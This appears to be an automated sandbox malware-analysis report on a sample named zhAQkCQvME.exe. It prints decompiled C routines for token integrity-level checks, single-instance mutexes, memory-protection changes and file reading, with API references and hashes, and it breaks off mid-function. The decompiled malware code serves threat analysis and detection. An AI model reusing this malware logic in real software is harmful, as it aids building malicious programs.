Instruction ID: fb75195819b869458b1479e1f9a150f701aa40de57bda92db6a4512616ceb7b6
Opcode Fuzzy Hash: 36d5ca2778c0bd8dd114dac4eeddc6d27a8d281cbb889f0afd147a41b08ef5e6
Instruction Fuzzy Hash: DC318BB4901209EFDB14CFA1C948BFF77B4AB48300F10892AE501BA2C0D7789B55DBA6

Uniqueness

Uniqueness Score: 0.90%

Function 005C1826, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 225memoryUNIQUE

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 005C18F9
VirtualProtect.KERNELBASE ref: 005C19B9
VirtualProtect.KERNELBASE ref: 005C1CA0

Strings

Cy, xrefs: 005C1855

Memory Dump Source

Source File: 00000000.00000002.470846166.005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c0000_zhAQkCQvME.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy
API String ID: 544645111-3008677793
Opcode ID: e17aed6f9e8dbe43f09e6fe75c08709d2b9feb0c8c910028dd5cc93b1f58171e
Instruction ID: 092d6e768642e2720d55229455f9f06b49f8490d818d4ebbeaea2944688554ff
Opcode Fuzzy Hash: e17aed6f9e8dbe43f09e6fe75c08709d2b9feb0c8c910028dd5cc93b1f58171e
Instruction Fuzzy Hash: 7CB1E375A187818FD328CF29C080A9AFBE1BFC9314F15895EE9D997351D730A841CF86

Uniqueness

Uniqueness Score: 100.00%

Function 004101E0, Relevance: 6.1, APIs: 4, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E004101E0(intOrPtr _a4, WCHAR* _a8, long _a12) {
				WCHAR* _v8;
				char _v12;
				void* _v16;
				intOrPtr* _v20;
				short* _v24;
				void** _t29;
				WCHAR* _t36;

				_v20 = 0;
				_v24 = 0;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t29 =  &_v16;
				_push(_t29);
				_t46 = _a4;
				_push(_a4);
				L0041042E();
				if(_t29 != 0) {
					_v12 = E00407F40(_t46, 0x1941);
					_push(0);
					_push(_v16);
					_push(0x4187f0);
					_v24 = E00404CB0(_v12);
					E00408170( &_v12);
					_v12 = E00407F40(_v12, 0x201a);
					_t36 = E0040E0A0(0x80000002, _v24, _v12, 0); // executed
					_v8 = _t36;
					E00408170( &_v12);
					if(_v8 != 0) {
						PathUnquoteSpacesW(_v8);
						if(ExpandEnvironmentStringsW(_v8, _a8, _a12) != 0) {
							while(0 != 0) {
							}
							_v20 = 1;
							L15:
							if(_v16 != 0) {
								LocalFree(_v16);
							}
							if(_v8 != 0) {
								E00403F10( &_v8, 0xfffffffe);
							}
							return _v20;
						}
						while(0 != 0) {
						}
						goto L15;
					}
					while(0 != 0) {
					}
					goto L15;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x004101e6
0x004101ed
0x004101f4
0x004101fb
0x00410202
0x00410209
0x0041020c
0x0041020d
0x00410210
0x00410211
0x00410218
0x00410234
0x00410237
0x0041023c
0x0041023d
0x0041024e
0x00410255
0x0041026a
0x0041027c
0x00410284
0x0041028b
0x00410297
0x004102a5
0x004102bf
0x004102c9
0x004102cd
0x004102cf
0x004102d6
0x004102da
0x004102e0
0x004102e0
0x004102ea
0x004102f2
0x004102f7
0x00000000
0x004102fa
0x004102c1
0x004102c5
0x00000000
0x004102c7
0x00410299
0x0041029d
0x00000000
0x0041029f
0x0041021a
0x0041021e
0x00000000

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00410211
PathUnquoteSpacesW.SHLWAPI(?), ref: 004102A5
ExpandEnvironmentStringsW.KERNEL32(?,?,?), ref: 004102B7
LocalFree.KERNEL32(?), ref: 004102E0

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: ConvertEnvironmentExpandFreeLocalPathSpacesStringStringsUnquote
String ID:
API String ID: 1452230276-0
Opcode ID: 258dc4de3cefc824e4b9ea956e4c2e2f3db458fff2fbb2d84dda3668f7cfbd0b
Instruction ID: b85094290a541de3a1ac585070c784805b35f8bd8743f5da276c3c4586068c2b
Opcode Fuzzy Hash: 258dc4de3cefc824e4b9ea956e4c2e2f3db458fff2fbb2d84dda3668f7cfbd0b
Instruction Fuzzy Hash: 603181B5D00209FBDB10DFE5D949BEF7774AB44304F1085AEE50166281EBB99EC0CB96

Uniqueness

Uniqueness Score: 0.72%

Function 004076E0, Relevance: 6.1, APIs: 4, Instructions: 93
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E004076E0(void* _a4) {
				char _v8;
				char _v9;
				void* _v16;
				void** _v20;
				intOrPtr* _v24;
				char* _v28;
				void** _t31;

				_v9 = 0;
				_v20 = 0;
				if(OpenProcessToken(_a4, 8,  &_v16) != 0) {
					_t31 = E004072A0(_v16, 0x19,  &_v8); // executed
					_v20 = _t31;
					if(_v20 != 0) {
						_v28 = GetSidSubAuthorityCount( *_v20);
						if(_v28 == 0 || ( *_v28 & 0x000000ff) == 0) {
							while(0 != 0) {
							}
						} else {
							_v24 = GetSidSubAuthority( *_v20, ( *_v28 & 0x000000ff) - 1);
							if(_v24 != 0) {
								if( *_v24 >= 0x2000) {
									if( *_v24 < 0x2000 ||  *_v24 >= 0x3000) {
										if( *_v24 >= 0x3000) {
											_v9 = 3;
										}
									} else {
										_v9 = 2;
									}
								} else {
									_v9 = 1;
								}
								L24:
								if(_v20 != 0) {
									E00403F10( &_v20, 0);
								}
								CloseHandle(_v16); // executed
								return _v9;
							}
							while(0 != 0) {
							}
						}
						goto L24;
					}
					while(0 != 0) {
					}
					goto L24;
				}
				L1:
				if(0 == 0) {
					return 0;
				} else {
				}
				goto L1;
			}

0x004076e6
0x004076ea
0x00407703
0x0040771c
0x00407724
0x0040772b
0x00407744
0x0040774b
0x00407757
0x0040775b
0x0040775f
0x00407775
0x0040777c
0x0040778f
0x004077a0
0x004077bc
0x004077be
0x004077be
0x004077ad
0x004077ad
0x004077ad
0x00407791
0x00407791
0x00407791
0x004077c2
0x004077c6
0x004077ce
0x004077d3
0x004077da
0x00000000
0x004077e0
0x0040777e
0x00407782
0x00407784
0x00000000
0x0040774b
0x0040772d
0x00407731
0x00000000
0x00407733
0x00407705
0x00407707
0x00000000
0x00000000
0x00407709
0x00000000

APIs

OpenProcessToken.ADVAPI32(0040A4C9,00000008,?), ref: 004076FB
GetSidSubAuthorityCount.ADVAPI32 ref: 0040773E
GetSidSubAuthority.ADVAPI32(00000000,-00000001), ref: 0040776F
CloseHandle.KERNELBASE(?), ref: 004077DA

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Authority$CloseCountHandleOpenProcessToken
String ID:
API String ID: 1786183074-0
Opcode ID: 11b1f0303bdf322de7b8cc9aa2e2cfc8786458bf0916349dcfaa300a581f04a8
Instruction ID: ba48b33abaa8f2fc6b0dcf9ef110078ceb699e71d41c1bbfdea10782a02876c3
Opcode Fuzzy Hash: 11b1f0303bdf322de7b8cc9aa2e2cfc8786458bf0916349dcfaa300a581f04a8
Instruction Fuzzy Hash: 50312A74D08209DBDB14CBA0C845BBEBBB6BB45385F10447AD401B72C1D7B97A41CBAB

Uniqueness

Uniqueness Score: 0.42%

Function 00402C20, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76
UNIQUE

Download Yara Rule

C-Code - Quality: 62%

			E00402C20(void* __ecx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				intOrPtr _v44;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t21;
				short _t24;
				int _t26;
				void* _t27;
				short _t31;
				short _t34;
				void* _t36;
				void* _t37;
				void* _t40;
				void* _t42;

				_t42 = __fp0;
				_t27 = __ecx;
				_v8 = 0;
				do {
				} while (0 != 0);
				E00404120(_t27, 0x421660, 0, 0x54);
				_t37 = _t36 + 0xc;
				__eflags = ( *0x41fb72 & 0x0000ffff) - 0x3a;
				if(( *0x41fb72 & 0x0000ffff) == 0x3a) {
					_t34 =  *0x41fb70; // 0x43
					_v40 = _t34;
					_t24 =  *0x41fb72; // 0x3a
					_v38 = _t24;
					_t31 =  *0x41fb74; // 0x5c
					_v36 = _t31;
					__eflags = 0;
					_v34 = 0;
					_t26 = GetDriveTypeW( &_v40); // executed
					_v8 = _t26;
				}
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				__eflags = _v8 - 2;
				if(__eflags != 0) {
					 *0x421664 = 2;
				} else {
					 *0x421664 = 4;
				}
				 *0x42166c = _a4;
				_t16 =  *0x41e004; // 0x7d
				 *0x421668 = _t16; // executed
				_t17 = E00402AF0(__eflags, _t42); // executed
				__eflags = _t17;
				if(__eflags != 0) {
					L16:
					__eflags = _a8;
					if(_a8 == 0) {
						E0040F770(_t42, 0x421660); // executed
					} else {
						E0040F630(0x421660);
					}
					__eflags = 0;
					return 0;
				} else {
					_t21 = E00408FF0(0, __eflags, 0xa);
					_t40 = _t37 + 4;
					_v44 = _t21;
					__eflags = _v44;
					if(_v44 == 0) {
						E00403BF0(0, "spx22", "a", 0x40);
						_t37 = _t40 + 0xc;
					} else {
						E00403BF0(_v44, "spx22", _v44, 0x40);
						_t37 = _t40 + 0xc;
					}
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							goto L16;
						}
					}
					goto L16;
				}
			}

0x00402c20
0x00402c20
0x00402c26
0x00402c2d
0x00402c2d
0x00402c3c
0x00402c41
0x00402c4b
0x00402c4e
0x00402c50
0x00402c57
0x00402c5b
0x00402c61
0x00402c65
0x00402c6c
0x00402c70
0x00402c72
0x00402c7a
0x00402c80
0x00402c80
0x00402c83
0x00402c83
0x00402c85
0x00000000
0x00000000
0x00402c87
0x00402c89
0x00402c8d
0x00402c9b
0x00402c8f
0x00402c8f
0x00402c8f
0x00402ca8
0x00402cae
0x00402cb3
0x00402cb8
0x00402cbd
0x00402cbf
0x00402d03
0x00402d03
0x00402d07
0x00402d1d
0x00402d09
0x00402d0e
0x00402d13
0x00402d25
0x00402d2a
0x00402cc1
0x00402cc3
0x00402cc8
0x00402ccb
0x00402cce
0x00402cd2
0x00402cf5
0x00402cfa
0x00402cd4
0x00402cdf
0x00402ce4
0x00402ce4
0x00402cfd
0x00402cfd
0x00402cff
0x00000000
0x00000000
0x00402d01
0x00000000
0x00402cfd

APIs

GetDriveTypeW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,004035CB,00000000), ref: 00402C7A

Strings

C:\Users\user\Desktop\zhAQkCQvME.exe, xrefs: 00402C50
spx22, xrefs: 00402CDA, 00402CF0

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: DriveType
String ID: C:\Users\user\Desktop\zhAQkCQvME.exe$spx22
API String ID: 338552980-128401325
Opcode ID: 86397c79d9f0a8e5489730be07d28726b239c1f2c7a5043a206f21a0a698003a
Instruction ID: 15f1d2d47c34fac8e603ad317ab6864944e96f1b2f57e247c555c2d46c49c99c
Opcode Fuzzy Hash: 86397c79d9f0a8e5489730be07d28726b239c1f2c7a5043a206f21a0a698003a
Instruction Fuzzy Hash: A821E474E04204D7EB10AF61AE0EBDE3660AF28708F14803BE905723E1E6BD5946DB5F

Uniqueness

Uniqueness Score: 100.00%

Function 004086D0, Relevance: 4.6, APIs: 3, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004086D0(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				void* _v12;
				char _v16;
				DWORD* _v20;
				void* _t30;
				DWORD* _t32;
				void* _t35;
				void* _t55;
				void* _t56;
				void* _t57;

				_v12 = 0;
				_v20 = 0;
				_t30 = E004085A0(__ecx, _a4); // executed
				_t56 = _t55 + 4;
				_v12 = _t30;
				if(_v12 != 0) {
					_t44 = _v12;
					_v8 = GetFileSize(_v12, 0);
					if(_v8 != 0) {
						_t32 = E00403EE0(_t44, _v8 + 1); // executed
						_t57 = _t56 + 4;
						_v20 = _t32;
						if(_v20 != 0) {
							_t35 = E00408660(_v12, _v20, _v8,  &_v16); // executed
							_t57 = _t57 + 0x10;
							if(_t35 != 0) {
								if(_v16 == _v8) {
									 *((char*)(_v20 + _v8)) = 0;
									if(_a8 != 0) {
										 *_a8 = _v8;
									}
									CloseHandle(_v12); // executed
									return _v20;
								}
								L13:
								if(_v12 != 0) {
									CloseHandle(_v12);
								}
								if(_v20 != 0) {
									E00403F10( &_v20, 0);
								}
								return 0;
							}
							goto L13;
						}
						goto L13;
					}
					goto L13;
				}
				goto L13;
			}

0x004086d6
0x004086dd
0x004086e8
0x004086ed
0x004086f0
0x004086f7
0x004086fd
0x00408707
0x0040870e
0x00408719
0x0040871e
0x00408721
0x00408728
0x0040873c
0x00408741
0x00408746
0x00408750
0x0040875a
0x00408761
0x00408769
0x00408769
0x0040876f
0x00000000
0x00408775
0x0040877a
0x0040877e
0x00408784
0x00408784
0x0040878e
0x00408796
0x0040879b
0x00000000
0x0040879e
0x00000000
0x00408748
0x00000000
0x0040872a
0x00000000
0x00408710
0x00000000

APIs

Part of subcall function 004085A0: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004085BE

GetFileSize.KERNEL32(?,00000000), ref: 00408701
CloseHandle.KERNEL32(?), ref: 00408784

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: b3b835c3130438699170c601d6e3ec930e877fb9e4de13cc9a66e99816c2301c
Instruction ID: e83db47838523e08b603468738e100922344c23575ea93a0880a199b7541e2dd
Opcode Fuzzy Hash: b3b835c3130438699170c601d6e3ec930e877fb9e4de13cc9a66e99816c2301c
Instruction Fuzzy Hash: 9A316DB4D00218EBDF00DFA4CE84BAEBBB4FB44305F20856EE84577285DB789A41CB49

Uniqueness

Uniqueness Score: 8.94%

Function 004072A0, Relevance: 4.6, APIs: 3, Instructions: 64
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 46%

			E004072A0(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, DWORD* _a12) {
				void* _v8;
				long _v12;
				int _t17;
				int _t24;

				_v8 = 0;
				_t29 = _a8;
				_t17 = GetTokenInformation(_a4, _a8, 0, 0,  &_v12); // executed
				if(_t17 != 0 || GetLastError() != 0x7a) {
					while(0 != 0) {
					}
					goto L13;
				} else {
					_v8 = E00403EE0(_t29, _v12);
					if(_v8 != 0) {
						_t24 = GetTokenInformation(_a4, _a8, _v8, _v12, _a12); // executed
						if(_t24 != 0) {
							L13:
							return _v8;
						}
						while(0 != 0) {
						}
						if(_v8 != 0) {
							E00403F10( &_v8, 0);
						}
						return 0;
					}
					while(0 != 0) {
					}
					return 0;
				}
			}

0x004072a6
0x004072b5
0x004072bd
0x004072c5
0x00407319
0x0040731d
0x00000000
0x004072d2
0x004072de
0x004072e5
0x00407305
0x0040730d
0x0040731f
0x00000000
0x0040731f
0x0040730f
0x00407313
0x00407328
0x00407330
0x00407335
0x00000000
0x00407338
0x004072e7
0x004072eb
0x00000000
0x004072ed

APIs

GetTokenInformation.KERNELBASE(00000001,00000001(TokenIntegrityLevel),00000000,00000000,00000001,00000001), ref: 004072BD
GetLastError.KERNEL32 ref: 004072C7

Part of subcall function 00403EE0: RtlAllocateHeap.NTDLL(015D0000,00000008,00415340,?,?,00403F90,00407DD5,?,?,00407DD6,00415340,00000839), ref: 00403EF1

GetTokenInformation.KERNELBASE(?,?,00000000,?,?), ref: 00407305

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: 2605e3bb8beab7128044c4a3dc02e99d6c2c63cb442ca7c50829e3eaacc6a3fc
Instruction ID: 3b4569979c529bbf79131bf1e36cd60bf99054f6d3931b16e191a1e424ff534b
Opcode Fuzzy Hash: 2605e3bb8beab7128044c4a3dc02e99d6c2c63cb442ca7c50829e3eaacc6a3fc
Instruction Fuzzy Hash: 18114575D08105EBEB10DAA5D845BAE77786B84345F10847AFD05E7280D638BA01E75B

Uniqueness

Uniqueness Score: 0.15%

Function 004074B0, Relevance: 4.6, APIs: 3, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E004074B0(void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				char _t19;

				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				if(OpenProcessToken(_a4, 8,  &_v16) != 0) {
					_t19 = E00407480(_v16); // executed
					_v20 = _t19;
					if(_v20 != 0) {
						CloseHandle(_v16); // executed
						return _v20;
					}
					while(0 != 0) {
					}
					if(_v20 != 0) {
						E00403F10( &_v20, 0);
					}
					if(_v16 != 0) {
						CloseHandle(_v16);
					}
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x004074b6
0x004074bd
0x004074c4
0x004074cb
0x004074e4
0x004074f4
0x004074fc
0x00407503
0x00407511
0x00000000
0x00407517
0x00407505
0x00407509
0x00407520
0x00407528
0x0040752d
0x00407534
0x0040753a
0x0040753a
0x00000000
0x00407540
0x004074e6
0x004074ea
0x00000000

APIs

OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 004074DC
CloseHandle.KERNELBASE(00000000), ref: 00407511
CloseHandle.KERNEL32(00000000), ref: 0040753A

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CloseHandle$OpenProcessToken
String ID:
API String ID: 2202715855-0
Opcode ID: 7ddadffd3ff8d0c7b9ff6fd9305335a0ddd8bbe8df69716b7d9ea8dbc1e251ad
Instruction ID: 931122922b87eb012bc84c8ccfbf61dc597c3ffc7821d07ba8d0677a1a6dc49c
Opcode Fuzzy Hash: 7ddadffd3ff8d0c7b9ff6fd9305335a0ddd8bbe8df69716b7d9ea8dbc1e251ad
Instruction Fuzzy Hash: C0115170E08219ABDB10DFA0DC497EF7778BB04308F44447AE411A62C0D779A604CB9B

Uniqueness

Uniqueness Score: 4.01%

Function 004070B0, Relevance: 4.5, APIs: 3, Instructions: 42
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E004070B0(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				void* _v8;
				void* _t11;

				_push(__ecx);
				_v8 = 0;
				_t11 = CreateMutexA(0, 1, _a4); // executed
				_v8 = _t11;
				if(_v8 != 0) {
					if(GetLastError() != 0xb7) {
						L11:
						return _v8;
					}
					while(0 != 0) {
					}
					if(E00407170(_v8, _v8, _a8) >= 0) {
						goto L11;
					}
					while(0 != 0) {
					}
					CloseHandle(_v8);
					_v8 = 0;
					goto L11;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x004070b3
0x004070b4
0x004070c3
0x004070c9
0x004070d0
0x004070e7
0x0040711a
0x00000000
0x0040711a
0x004070e9
0x004070ed
0x00407101
0x00000000
0x00000000
0x00407103
0x00407107
0x0040710d
0x00407113
0x00000000
0x00407113
0x004070d2
0x004070d6
0x00000000

APIs

CreateMutexA.KERNELBASE(00000000,00000001,?,?,?,0040EDC3,?,00000064), ref: 004070C3
GetLastError.KERNEL32(?,?,0040EDC3,?,00000064), ref: 004070DC
CloseHandle.KERNEL32(?), ref: 0040710D

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CloseCreateErrorHandleLastMutex
String ID:
API String ID: 4294037311-0
Opcode ID: 3395fe8caef786914532343a760dcbe441a1e742d81a56c36f5c66218eaa6c0a
Instruction ID: 8cf3c75d22653ef4c1fc13696352e33cfb76cbd4bdfa4ec6ffc5522fdd31bbaf
Opcode Fuzzy Hash: 3395fe8caef786914532343a760dcbe441a1e742d81a56c36f5c66218eaa6c0a
Instruction Fuzzy Hash: E501AD70E09208EBDF10CBA1D805BAF36A4AB44341F20857AE809AB3C1D679BE01975B

Uniqueness

Uniqueness Score: 0.23%

Function 00407050, Relevance: 4.5, APIs: 3, Instructions: 32
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00407050(void* __ecx, CHAR* _a4) {
				void* _v8;
				void* _t8;

				_v8 = 0;
				_t8 = CreateMutexA(0, 1, _a4); // executed
				_v8 = _t8;
				if(_v8 != 0) {
					if(GetLastError() != 0xb7) {
						return _v8;
					}
					while(0 != 0) {
					}
					CloseHandle(_v8);
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x00407054
0x00407063
0x00407069
0x00407070
0x00407087
0x00000000
0x0040709d
0x00407089
0x0040708d
0x00407093
0x00000000
0x00407099
0x00407072
0x00407076
0x00000000

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00408BB5,00000000,?,00408BB5), ref: 00407063
GetLastError.KERNEL32(?,00408BB5), ref: 0040707C
CloseHandle.KERNEL32(00000000), ref: 00407093

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CloseCreateErrorHandleLastMutex
String ID:
API String ID: 4294037311-0
Opcode ID: a61de82fc9d52ef27bb4a5357717c5dda95cae0f2b676368618cd6d4b06fb171
Instruction ID: 913e233602b2b4186a0f49ae16dd18c351c1312bcc942f800ca6fa9aba9c2a58
Opcode Fuzzy Hash: a61de82fc9d52ef27bb4a5357717c5dda95cae0f2b676368618cd6d4b06fb171
Instruction Fuzzy Hash: 5EF0B430E1C108FBDB10CBA0C848BAE37A4A708300F204672E406E62C0D6396D00966B

Uniqueness

Uniqueness Score: 0.23%

Function 004056C0, Relevance: 3.9, APIs: 3, Instructions: 133
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004056C0(void* __ecx, WCHAR* _a4, signed int _a8, intOrPtr _a12, short _a16) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				void* _v20;
				WCHAR* _t52;
				short _t56;
				void* _t69;
				void* _t71;
				void* _t102;
				void* _t103;
				void* _t104;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t52 = E00403EE0(__ecx, 0x448);
				_t103 = _t102 + 4;
				_v16 = _t52;
				if(_v16 != 0) {
					_v16[0x21a] = _a8;
					_v16[0x21c] = _a16;
					lstrcpynW(_v16, _a4, 0x200);
					_t81 = _a8 & 0x000000ff;
					if((_a8 & 0x000000ff) != 1) {
						_t56 = E00403EE0(_t81, 0x100000); // executed
						_t104 = _t103 + 4;
						_v16[0x212] = _t56;
						if(_v16[0x212] != 0) {
							_v16[0x216] = 0x100000;
							if(_a12 != 0) {
								E00405360(_v16, _a12);
							}
							L20:
							return _v16;
						}
						while(0 != 0) {
						}
						L21:
						if(_v8 != 0) {
							E00403F10( &_v8, 0);
							_t104 = _t104 + 8;
						}
						if(_v16 != 0) {
							if(_v16[0x218] != 0) {
								CloseHandle(_v16[0x218]);
							}
							if(_v16[0x212] != 0) {
								E00403F10( &(_v16[0x212]), 0);
								_t104 = _t104 + 8;
							}
							E00403F10( &_v16, 0);
						}
						return 0;
					}
					_v20 = 0;
					_t69 = E004086D0(_t81, _a4,  &_v12);
					_t104 = _t103 + 8;
					_v8 = _t69;
					if(_v8 != 0) {
						_t71 = E004053B0(_v16, _v8, _v12, _a12);
						_t104 = _t104 + 0x10;
						_v20 = _t71;
						if(_v20 >= 0) {
							CloseHandle(_v16[0x218]);
							_v16[0x218] = 0;
							E00403F10( &_v8, 0);
							goto L20;
						}
						while(0 != 0) {
						}
						goto L21;
					}
					while(0 != 0) {
					}
					goto L21;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x004056c6
0x004056cd
0x004056d4
0x004056e0
0x004056e5
0x004056e8
0x004056ef
0x00405704
0x00405710
0x00405723
0x00405729
0x00405730
0x004057bc
0x004057c1
0x004057c7
0x004057d7
0x004057e4
0x004057f2
0x004057fc
0x00405801
0x00405804
0x00000000
0x00405804
0x004057d9
0x004057dd
0x00405809
0x0040580d
0x00405815
0x0040581a
0x0040581a
0x00405821
0x0040582d
0x00405839
0x00405839
0x00405849
0x00405857
0x0040585c
0x0040585c
0x00405865
0x0040586a
0x00000000
0x0040586d
0x00405736
0x00405745
0x0040574a
0x0040574d
0x00405754
0x00405771
0x00405776
0x00405779
0x00405780
0x00405794
0x0040579d
0x004057ad
0x00000000
0x004057b2
0x00405782
0x00405786
0x00000000
0x00405788
0x00405756
0x0040575a
0x00000000
0x0040575c
0x004056f1
0x004056f5
0x00000000

APIs

Part of subcall function 00403EE0: RtlAllocateHeap.NTDLL(015D0000,00000008,00415340,?,?,00403F90,00407DD5,?,?,00407DD6,00415340,00000839), ref: 00403EF1

lstrcpynW.KERNEL32(?,?,00000200), ref: 00405723
CloseHandle.KERNEL32(?), ref: 00405794
CloseHandle.KERNEL32(00000000), ref: 00405839

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CloseHandle$AllocateHeaplstrcpyn
String ID:
API String ID: 3610462010-0
Opcode ID: a68f85ced3073d87c1b4afb819ad5e62a6536cfa086889750667ef578475b76a
Instruction ID: 2c92582190bda643b19c958f1e6afd751b2e9ed3727031c7522ac474ab779873
Opcode Fuzzy Hash: a68f85ced3073d87c1b4afb819ad5e62a6536cfa086889750667ef578475b76a
Instruction Fuzzy Hash: 9E51ADB5E00208EBCB00EFA0D845BAFB7B4EB44304F5485BAE915772C2D7799A44DF99

Uniqueness

Uniqueness Score: 4.31%

Function 00403F10, Relevance: 3.8, APIs: 3, Instructions: 39
stringmemoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00403F10(void** _a4, int _a8) {
				intOrPtr* _t12;
				int _t16;
				void* _t21;

				_t12 = _a4;
				if( *_t12 == 0) {
